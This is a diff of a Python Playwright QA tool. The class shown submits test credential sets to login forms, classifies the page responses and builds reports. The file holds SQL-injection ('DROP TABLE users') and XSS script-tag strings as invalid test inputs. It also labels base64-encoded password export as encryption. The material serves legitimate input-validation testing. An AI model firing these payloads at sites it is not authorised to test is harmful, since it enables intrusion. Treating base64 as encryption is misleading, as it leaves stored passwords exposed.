created_at=datetime.now()
|
| 143 |
+
),
|
| 144 |
+
|
| 145 |
+
# Security test credentials
|
| 146 |
+
CredentialSet(
|
| 147 |
+
name="SQL Injection Email",
|
| 148 |
+
email="admin'; DROP TABLE users; --",
|
| 149 |
+
password="ValidPass123!",
|
| 150 |
+
description="SQL injection attempt in email",
|
| 151 |
+
is_valid=False,
|
| 152 |
+
category="security_test",
|
| 153 |
+
created_at=datetime.now()
|
| 154 |
+
),
|
| 155 |
+
CredentialSet(
|
| 156 |
+
name="XSS Email",
|
| 157 |
+
email="<script>alert('XSS')</script>@example.com",
|
| 158 |
+
password="ValidPass123!",
|
| 159 |
+
description="XSS attempt in email",
|
| 160 |
+
is_valid=False,
|
| 161 |
+
category="security_test",
|
| 162 |
+
created_at=datetime.now()
|
| 163 |
+
),
|
| 164 |
+
CredentialSet(
|
| 165 |
+
name="SQL Injection Password",
|
| 166 |
+
email="test@example.com",
|
| 167 |
+
password="'; DROP TABLE users; --",
|
| 168 |
+
description="SQL injection attempt in password",
|
| 169 |
+
is_valid=False,
|
| 170 |
+
category="security_test",
|
| 171 |
+
created_at=datetime.now()
|
| 172 |
+
)
|
| 173 |
+
]
|
| 174 |
+
|
| 175 |
+
self.credential_sets.extend(default_credentials)
|
| 176 |
+
logger.info(f"✅ Initialized {len(default_credentials)} default credential sets")
|
| 177 |
+
|
| 178 |
+
def add_credential_set(self, name: str, email: str, password: str,
|
| 179 |
+
description: str = "", category: str = "custom") -> bool:
|
| 180 |
+
"""Add a new credential set."""
|
| 181 |
+
try:
|
| 182 |
+
credential_set = CredentialSet(
|
| 183 |
+
name=name,
|
| 184 |
+
email=email,
|
| 185 |
+
password=password,
|
| 186 |
+
description=description,
|
| 187 |
+
is_valid=self._validate_credentials(email, password),
|
| 188 |
+
category=category,
|
| 189 |
+
created_at=datetime.now()
|
| 190 |
+
)
|
| 191 |
+
|
| 192 |
+
self.credential_sets.append(credential_set)
|
| 193 |
+
logger.info(f"✅ Added credential set: {name}")
|
| 194 |
+
return True
|
| 195 |
+
|
| 196 |
+
except Exception as e:
|
| 197 |
+
logger.error(f"❌ Error adding credential set: {e}")
|
| 198 |
+
return False
|
| 199 |
+
|
| 200 |
+
def _validate_credentials(self, email: str, password: str) -> bool:
|
| 201 |
+
"""Validate if credentials are in correct format."""
|
| 202 |
+
# Basic email validation
|
| 203 |
+
email_valid = "@" in email and "." in email.split("@")[-1]
|
| 204 |
+
|
| 205 |
+
# Basic password validation (at least 8 characters)
|
| 206 |
+
password_valid = len(password) >= 8
|
| 207 |
+
|
| 208 |
+
return email_valid and password_valid
|
| 209 |
+
|
| 210 |
+
def get_credentials_by_category(self, category: str) -> List[CredentialSet]:
|
| 211 |
+
"""Get credentials by category."""
|
| 212 |
+
return [cred for cred in self.credential_sets if cred.category == category]
|
| 213 |
+
|
| 214 |
+
def get_credentials_by_validity(self, is_valid: bool) -> List[CredentialSet]:
|
| 215 |
+
"""Get credentials by validity."""
|
| 216 |
+
return [cred for cred in self.credential_sets if cred.is_valid == is_valid]
|
| 217 |
+
|
| 218 |
+
async def discover_credential_fields(self) -> Dict[str, Locator]:
|
| 219 |
+
"""Discover email and password fields on the page."""
|
| 220 |
+
logger.info("🔍 Discovering credential fields...")
|
| 221 |
+
|
| 222 |
+
fields = {}
|
| 223 |
+
|
| 224 |
+
try:
|
| 225 |
+
# Find email fields
|
| 226 |
+
email_selectors = [
|
| 227 |
+
"input[type='email']",
|
| 228 |
+
"input[name*='email']",
|
| 229 |
+
"input[placeholder*='email' i]",
|
| 230 |
+
"input[id*='email']",
|
| 231 |
+
"input[class*='email']"
|
| 232 |
+
]
|
| 233 |
+
|
| 234 |
+
for selector in email_selectors:
|
| 235 |
+
elements = await self.page.locator(selector).all()
|
| 236 |
+
if elements:
|
| 237 |
+
fields["email"] = elements[0]
|
| 238 |
+
logger.info(f"📧 Found email field: {selector}")
|
| 239 |
+
break
|
| 240 |
+
|
| 241 |
+
# Find password fields
|
| 242 |
+
password_selectors = [
|
| 243 |
+
"input[type='password']",
|
| 244 |
+
"input[name*='password']",
|
| 245 |
+
"input[placeholder*='password' i]",
|
| 246 |
+
"input[id*='password']",
|
| 247 |
+
"input[class*='password']"
|
| 248 |
+
]
|
| 249 |
+
|
| 250 |
+
for selector in password_selectors:
|
| 251 |
+
elements = await self.page.locator(selector).all()
|
| 252 |
+
if elements:
|
| 253 |
+
fields["password"] = elements[0]
|
| 254 |
+
logger.info(f"🔐 Found password field: {selector}")
|
| 255 |
+
break
|
| 256 |
+
|
| 257 |
+
# Find username fields (alternative to email)
|
| 258 |
+
if "email" not in fields:
|
| 259 |
+
username_selectors = [
|
| 260 |
+
"input[name*='username']",
|
| 261 |
+
"input[name*='user']",
|
| 262 |
+
"input[placeholder*='username' i]",
|
| 263 |
+
"input[placeholder*='user' i]",
|
| 264 |
+
"input[id*='username']",
|
| 265 |
+
"input[id*='user']"
|
| 266 |
+
]
|
| 267 |
+
|
| 268 |
+
for selector in username_selectors:
|
| 269 |
+
elements = await self.page.locator(selector).all()
|
| 270 |
+
if elements:
|
| 271 |
+
fields["username"] = elements[0]
|
| 272 |
+
logger.info(f"��� Found username field: {selector}")
|
| 273 |
+
break
|
| 274 |
+
|
| 275 |
+
logger.info(f"✅ Field discovery complete: {list(fields.keys())}")
|
| 276 |
+
return fields
|
| 277 |
+
|
| 278 |
+
except Exception as e:
|
| 279 |
+
logger.error(f"❌ Error discovering credential fields: {e}")
|
| 280 |
+
return {}
|
| 281 |
+
|
| 282 |
+
async def test_credentials(self, credential_set: CredentialSet,
|
| 283 |
+
fields: Dict[str, Locator]) -> CredentialTestResult:
|
| 284 |
+
"""Test a specific credential set."""
|
| 285 |
+
logger.info(f"🧪 Testing credentials: {credential_set.name}")
|
| 286 |
+
|
| 287 |
+
try:
|
| 288 |
+
# Clear existing fields
|
| 289 |
+
await self._clear_credential_fields(fields)
|
| 290 |
+
|
| 291 |
+
# Fill email/username field
|
| 292 |
+
if "email" in fields:
|
| 293 |
+
await fields["email"].fill(credential_set.email)
|
| 294 |
+
elif "username" in fields:
|
| 295 |
+
await fields["username"].fill(credential_set.email) # Use email as username
|
| 296 |
+
|
| 297 |
+
# Fill password field
|
| 298 |
+
if "password" in fields:
|
| 299 |
+
await fields["password"].fill(credential_set.password)
|
| 300 |
+
|
| 301 |
+
# Take screenshot before submission
|
| 302 |
+
screenshot_path = f"./screenshots/credential_test_{credential_set.name.replace(' ', '_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.png"
|
| 303 |
+
await self.page.screenshot(path=screenshot_path)
|
| 304 |
+
|
| 305 |
+
# Submit form
|
| 306 |
+
await self._submit_form()
|
| 307 |
+
|
| 308 |
+
# Wait for response
|
| 309 |
+
await asyncio.sleep(2)
|
| 310 |
+
|
| 311 |
+
# Analyze result
|
| 312 |
+
response_type = await self._analyze_credential_response()
|
| 313 |
+
|
| 314 |
+
# Determine success
|
| 315 |
+
success = self._evaluate_credential_result(credential_set, response_type)
|
| 316 |
+
|
| 317 |
+
result = CredentialTestResult(
|
| 318 |
+
credential_set=credential_set,
|
| 319 |
+
success=success,
|
| 320 |
+
response_type=response_type,
|
| 321 |
+
screenshot_path=screenshot_path,
|
| 322 |
+
timestamp=datetime.now()
|
| 323 |
+
)
|
| 324 |
+
|
| 325 |
+
self.test_results.append(result)
|
| 326 |
+
logger.info(f"✅ Credential test complete: {credential_set.name} - {response_type}")
|
| 327 |
+
return result
|
| 328 |
+
|
| 329 |
+
except Exception as e:
|
| 330 |
+
logger.error(f"❌ Error testing credentials {credential_set.name}: {e}")
|
| 331 |
+
return CredentialTestResult(
|
| 332 |
+
credential_set=credential_set,
|
| 333 |
+
success=False,
|
| 334 |
+
response_type="error",
|
| 335 |
+
error_message=str(e),
|
| 336 |
+
timestamp=datetime.now()
|
| 337 |
+
)
|
| 338 |
+
|
| 339 |
+
async def _clear_credential_fields(self, fields: Dict[str, Locator]):
|
| 340 |
+
"""Clear all credential fields."""
|
| 341 |
+
for field_name, field in fields.items():
|
| 342 |
+
try:
|
| 343 |
+
await field.clear()
|
| 344 |
+
except:
|
| 345 |
+
pass
|
| 346 |
+
|
| 347 |
+
async def _submit_form(self):
|
| 348 |
+
"""Submit the form."""
|
| 349 |
+
try:
|
| 350 |
+
# Try different submit button selectors
|
| 351 |
+
submit_selectors = [
|
| 352 |
+
"button[type='submit']",
|
| 353 |
+
"input[type='submit']",
|
| 354 |
+
"button:has-text('Login')",
|
| 355 |
+
"button:has-text('Sign In')",
|
| 356 |
+
"button:has-text('Submit')",
|
| 357 |
+
"form button",
|
| 358 |
+
"form input[type='submit']"
|
| 359 |
+
]
|
| 360 |
+
|
| 361 |
+
for selector in submit_selectors:
|
| 362 |
+
submit_btn = await self.page.locator(selector).first
|
| 363 |
+
if await submit_btn.count() > 0:
|
| 364 |
+
await submit_btn.click()
|
| 365 |
+
logger.info(f"📤 Form submitted using: {selector}")
|
| 366 |
+
return
|
| 367 |
+
|
| 368 |
+
# If no submit button found, try pressing Enter
|
| 369 |
+
await self.page.keyboard.press("Enter")
|
| 370 |
+
logger.info("📤 Form submitted using Enter key")
|
| 371 |
+
|
| 372 |
+
except Exception as e:
|
| 373 |
+
logger.error(f"❌ Error submitting form: {e}")
|
| 374 |
+
|
| 375 |
+
async def _analyze_credential_response(self) -> str:
|
| 376 |
+
"""Analyze the response after credential submission."""
|
| 377 |
+
try:
|
| 378 |
+
page_content = await self.page.content()
|
| 379 |
+
page_text = page_content.lower()
|
| 380 |
+
|
| 381 |
+
# Check for success indicators
|
| 382 |
+
success_indicators = [
|
| 383 |
+
"welcome", "dashboard", "profile", "account", "logged in",
|
| 384 |
+
"signed in", "success", "thank you", "confirmation"
|
| 385 |
+
]
|
| 386 |
+
|
| 387 |
+
for indicator in success_indicators:
|
| 388 |
+
if indicator in page_text:
|
| 389 |
+
return "success"
|
| 390 |
+
|
| 391 |
+
# Check for validation errors
|
| 392 |
+
validation_indicators = [
|
| 393 |
+
"invalid", "incorrect", "wrong", "error", "failed",
|
| 394 |
+
"required", "missing", "format", "invalid email",
|
| 395 |
+
"invalid password", "password too short"
|
| 396 |
+
]
|
| 397 |
+
|
| 398 |
+
for indicator in validation_indicators:
|
| 399 |
+
if indicator in page_text:
|
| 400 |
+
return "validation_error"
|
| 401 |
+
|
| 402 |
+
# Check for security-related responses
|
| 403 |
+
security_indicators = [
|
| 404 |
+
"security", "blocked", "suspicious", "malicious",
|
| 405 |
+
"injection", "script", "xss", "sql", "forbidden"
|
| 406 |
+
]
|
| 407 |
+
|
| 408 |
+
for indicator in security_indicators:
|
| 409 |
+
if indicator in page_text:
|
| 410 |
+
return "security_error"
|
| 411 |
+
|
| 412 |
+
# Check for authentication errors
|
| 413 |
+
auth_indicators = [
|
| 414 |
+
"not found", "user not found", "account not found",
|
| 415 |
+
"login failed", "authentication failed", "access denied"
|
| 416 |
+
]
|
| 417 |
+
|
| 418 |
+
for indicator in auth_indicators:
|
| 419 |
+
if indicator in page_text:
|
| 420 |
+
return "authentication_error"
|
| 421 |
+
|
| 422 |
+
return "unknown"
|
| 423 |
+
|
| 424 |
+
except Exception as e:
|
| 425 |
+
logger.error(f"❌ Error analyzing credential response: {e}")
|
| 426 |
+
return "error"
|
| 427 |
+
|
| 428 |
+
def _evaluate_credential_result(self, credential_set: CredentialSet, response_type: str) -> bool:
|
| 429 |
+
"""Evaluate if the credential test result is as expected."""
|
| 430 |
+
if credential_set.is_valid:
|
| 431 |
+
# Valid credentials should succeed
|
| 432 |
+
return response_type == "success"
|
| 433 |
+
else:
|
| 434 |
+
# Invalid credentials should fail with appropriate error
|
| 435 |
+
return response_type in ["validation_error", "authentication_error", "security_error"]
|
| 436 |
+
|
| 437 |
+
async def run_comprehensive_credential_testing(self) -> Dict[str, Any]:
|
| 438 |
+
"""Run comprehensive credential testing with all credential sets."""
|
| 439 |
+
logger.info("🚀 Starting comprehensive credential testing...")
|
| 440 |
+
|
| 441 |
+
# Discover credential fields
|
| 442 |
+
fields = await self.discover_credential_fields()
|
| 443 |
+
|
| 444 |
+
if not fields:
|
| 445 |
+
logger.warning("⚠️ No credential fields found on the page")
|
| 446 |
+
return {"error": "No credential fields found"}
|
| 447 |
+
|
| 448 |
+
# Test all credential sets
|
| 449 |
+
for credential_set in self.credential_sets:
|
| 450 |
+
await self.test_credentials(credential_set, fields)
|
| 451 |
+
await asyncio.sleep(1) # Delay between tests
|
| 452 |
+
|
| 453 |
+
# Generate comprehensive report
|
| 454 |
+
report = self._generate_credential_report()
|
| 455 |
+
|
| 456 |
+
logger.info(f"✅ Comprehensive credential testing complete: {len(self.test_results)} tests executed")
|
| 457 |
+
return report
|
| 458 |
+
|
| 459 |
+
def _generate_credential_report(self) -> Dict[str, Any]:
|
| 460 |
+
"""Generate a comprehensive credential testing report."""
|
| 461 |
+
total_tests = len(self.test_results)
|
| 462 |
+
passed_tests = sum(1 for r in self.test_results if r.success)
|
| 463 |
+
failed_tests = total_tests - passed_tests
|
| 464 |
+
|
| 465 |
+
# Categorize results
|
| 466 |
+
by_category = {}
|
| 467 |
+
by_validity = {"valid": [], "invalid": []}
|
| 468 |
+
by_response_type = {}
|
| 469 |
+
|
| 470 |
+
for result in self.test_results:
|
| 471 |
+
category = result.credential_set.category
|
| 472 |
+
validity = "valid" if result.credential_set.is_valid else "invalid"
|
| 473 |
+
response_type = result.response_type
|
| 474 |
+
|
| 475 |
+
if category not in by_category:
|
| 476 |
+
by_category[category] = []
|
| 477 |
+
by_category[category].append(result)
|
| 478 |
+
|
| 479 |
+
by_validity[validity].append(result)
|
| 480 |
+
|
| 481 |
+
if response_type not in by_response_type:
|
| 482 |
+
by_response_type[response_type] = []
|
| 483 |
+
by_response_type[response_type].append(result)
|
| 484 |
+
|
| 485 |
+
# Calculate success rates
|
| 486 |
+
success_rate = (passed_tests / total_tests * 100) if total_tests > 0 else 0
|
| 487 |
+
|
| 488 |
+
report = {
|
| 489 |
+
"summary": {
|
| 490 |
+
"total_tests": total_tests,
|
| 491 |
+
"passed_tests": passed_tests,
|
| 492 |
+
"failed_tests": failed_tests,
|
| 493 |
+
"success_rate": round(success_rate, 2),
|
| 494 |
+
"timestamp": datetime.now().isoformat()
|
| 495 |
+
},
|
| 496 |
+
"by_category": {
|
| 497 |
+
category: {
|
| 498 |
+
"total": len(results),
|
| 499 |
+
"passed": sum(1 for r in results if r.success),
|
| 500 |
+
"failed": sum(1 for r in results if not r.success)
|
| 501 |
+
}
|
| 502 |
+
for category, results in by_category.items()
|
| 503 |
+
},
|
| 504 |
+
"by_validity": {
|
| 505 |
+
validity: {
|
| 506 |
+
"total": len(results),
|
| 507 |
+
"passed": sum(1 for r in results if r.success),
|
| 508 |
+
"failed": sum(1 for r in results if not r.success)
|
| 509 |
+
}
|
| 510 |
+
for validity, results in by_validity.items()
|
| 511 |
+
},
|
| 512 |
+
"by_response_type": {
|
| 513 |
+
response_type: {
|
| 514 |
+
"total": len(results),
|
| 515 |
+
"passed": sum(1 for r in results if r.success),
|
| 516 |
+
"failed": sum(1 for r in results if not r.success)
|
| 517 |
+
}
|
| 518 |
+
for response_type, results in by_response_type.items()
|
| 519 |
+
},
|
| 520 |
+
"detailed_results": [
|
| 521 |
+
{
|
| 522 |
+
"credential_name": result.credential_set.name,
|
| 523 |
+
"email": result.credential_set.email,
|
| 524 |
+
"category": result.credential_set.category,
|
| 525 |
+
"is_valid": result.credential_set.is_valid,
|
| 526 |
+
"success": result.success,
|
| 527 |
+
"response_type": result.response_type,
|
| 528 |
+
"error_message": result.error_message,
|
| 529 |
+
"screenshot_path": result.screenshot_path,
|
| 530 |
+
"timestamp": result.timestamp.isoformat() if result.timestamp else None
|
| 531 |
+
}
|
| 532 |
+
for result in self.test_results
|
| 533 |
+
],
|
| 534 |
+
"recommendations": self._generate_credential_recommendations()
|
| 535 |
+
}
|
| 536 |
+
|
| 537 |
+
return report
|
| 538 |
+
|
| 539 |
+
def _generate_credential_recommendations(self) -> List[str]:
|
| 540 |
+
"""Generate recommendations based on credential test results."""
|
| 541 |
+
recommendations = []
|
| 542 |
+
|
| 543 |
+
if not self.test_results:
|
| 544 |
+
return ["No test results available for recommendations"]
|
| 545 |
+
|
| 546 |
+
# Analyze results
|
| 547 |
+
valid_creds = [r for r in self.test_results if r.credential_set.is_valid]
|
| 548 |
+
invalid_creds = [r for r in self.test_results if not r.credential_set.is_valid]
|
| 549 |
+
|
| 550 |
+
# Check if valid credentials are working
|
| 551 |
+
valid_success_rate = sum(1 for r in valid_creds if r.success) / len(valid_creds) if valid_creds else 0
|
| 552 |
+
if valid_success_rate < 0.5:
|
| 553 |
+
recommendations.append("⚠️ Valid credentials are not working properly. Check authentication system.")
|
| 554 |
+
|
| 555 |
+
# Check if invalid credentials are properly rejected
|
| 556 |
+
invalid_rejection_rate = sum(1 for r in invalid_creds if not r.success) / len(invalid_creds) if invalid_creds else 0
|
| 557 |
+
if invalid_rejection_rate < 0.8:
|
| 558 |
+
recommendations.append("🔒 Invalid credentials are not being properly rejected. Improve validation.")
|
| 559 |
+
|
| 560 |
+
# Check for security issues
|
| 561 |
+
security_tests = [r for r in self.test_results if r.credential_set.category == "security_test"]
|
| 562 |
+
if security_tests:
|
| 563 |
+
security_success_rate = sum(1 for r in security_tests if r.success) / len(security_tests)
|
| 564 |
+
if security_success_rate > 0.3:
|
| 565 |
+
recommendations.append("🚨 Security tests are passing when they should fail. Implement proper input sanitization.")
|
| 566 |
+
|
| 567 |
+
# Check response types
|
| 568 |
+
response_types = [r.response_type for r in self.test_results]
|
| 569 |
+
if "unknown" in response_types:
|
| 570 |
+
recommendations.append("❓ Some tests returned unknown responses. Improve error handling and user feedback.")
|
| 571 |
+
|
| 572 |
+
if not recommendations:
|
| 573 |
+
recommendations.append("✅ All credential tests are working as expected!")
|
| 574 |
+
|
| 575 |
+
return recommendations
|
| 576 |
+
|
| 577 |
+
def export_credentials(self, file_path: str) -> bool:
|
| 578 |
+
"""Export credentials to a file (encrypted)."""
|
| 579 |
+
try:
|
| 580 |
+
# Simple encryption (in production, use proper encryption)
|
| 581 |
+
encrypted_data = base64.b64encode(
|
| 582 |
+
json.dumps([{
|
| 583 |
+
"name": cred.name,
|
| 584 |
+
"email": cred.email,
|
| 585 |
+
"password": cred.password,
|
| 586 |
+
"description": cred.description,
|
| 587 |
+
"category": cred.category,
|
| 588 |
+
"created_at": cred.created_at.isoformat()
|
| 589 |
+
} for cred in self.credential_sets]).encode()
|
| 590 |
+
).decode()
|
| 591 |
+
|
| 592 |
+
with open(file_path, 'w') as f:
|
| 593 |
+
f.write(encrypted_data)
|
| 594 |
+
|
| 595 |
+
logger.info(f"✅ Credentials exported to: {file_path}")
|
| 596 |
+
return True
|
| 597 |
+
|
| 598 |
+
except Exception as e:
|
| 599 |
+
logger.error(f"❌ Error exporting credentials: {e}")
|
| 600 |
+
return False
|
| 601 |
+
|
| 602 |
+
def import_credentials(self, file_path: str) -> bool:
|
| 603 |
+
"""Import credentials from a file."""
|
| 604 |
+
try:
|
| 605 |
+
with open(file_path, 'r') as f:
|
| 606 |
+
encrypted_data = f.read()
|
| 607 |
+
|
| 608 |
+
# Simple decryption
|
| 609 |
+
decrypted_data = json.loads(base64.b64decode(encrypted_data).decode())
|
| 610 |
+
|
| 611 |
+
for cred_data in decrypted_data:
|
| 612 |
+
credential_set = CredentialSet(
|
| 613 |
+
name=cred_data["name"],
|
| 614 |
+
email=cred_data["email"],
|
| 615 |
+
password=cred_data["password"],
|
| 616 |
+
description=cred_data["description"],
|
| 617 |
+
is_valid=self._validate_credentials(cred_data["email"], cred_data["password"]),
|
| 618 |
+
category=cred_data["category"],
|
| 619 |
+
created_at=datetime.fromisoformat(cred_data["created_at"])
|
| 620 |
+
)
|
| 621 |
+
self.credential_sets.append(credential_set)
|
| 622 |
+
|
| 623 |
+
logger.info(f"✅ Credentials imported from: {file_path}")
|
| 624 |
+
return True
|
| 625 |
+
|
| 626 |
+
except Exception as e:
|
| 627 |
+
logger.error(f"❌ Error importing credentials: {e}")
|
| 628 |
+
return False
|
src/utils/enhanced_ai_testing.py
ADDED
|
@@ -0,0 +1,635 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Enhanced AI Testing Engine
|
| 3 |
+
====================================================================
|
| 4 |
+
|
| 5 |
+
Enhanced AI testing engine that aggressively finds errors, bugs, and issues
|
| 6 |
+
with comprehensive test scenarios and intelligent bug detection.
|
| 7 |
+
|
| 8 |
+
Author: Mejbaur Bahar Fagun
|
| 9 |
+
Role: Software Engineer in Test
|
| 10 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 11 |
+
"""
|
| 12 |
+
|
| 13 |
+
import asyncio
|
| 14 |
+
import random
|
| 15 |
+
import string
|
| 16 |
+
from typing import List, Dict, Any, Optional
|
| 17 |
+
from playwright.async_api import Page, Locator
|
| 18 |
+
import logging
|
| 19 |
+
from dataclasses import dataclass
|
| 20 |
+
from enum import Enum
|
| 21 |
+
|
| 22 |
+
logger = logging.getLogger(__name__)
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
class BugSeverity(Enum):
|
| 26 |
+
"""Bug severity levels."""
|
| 27 |
+
CRITICAL = "critical"
|
| 28 |
+
HIGH = "high"
|
| 29 |
+
MEDIUM = "medium"
|
| 30 |
+
LOW = "low"
|
| 31 |
+
INFO = "info"
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
@dataclass
|
| 35 |
+
class BugReport:
|
| 36 |
+
"""Bug report structure."""
|
| 37 |
+
title: str
|
| 38 |
+
severity: BugSeverity
|
| 39 |
+
description: str
|
| 40 |
+
steps_to_reproduce: List[str]
|
| 41 |
+
expected_behavior: str
|
| 42 |
+
actual_behavior: str
|
| 43 |
+
url: str
|
| 44 |
+
element_info: Dict[str, Any]
|
| 45 |
+
recommendations: List[str]
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
class EnhancedAITestingEngine:
|
| 49 |
+
"""Enhanced AI testing engine with aggressive bug finding capabilities."""
|
| 50 |
+
|
| 51 |
+
def __init__(self):
|
| 52 |
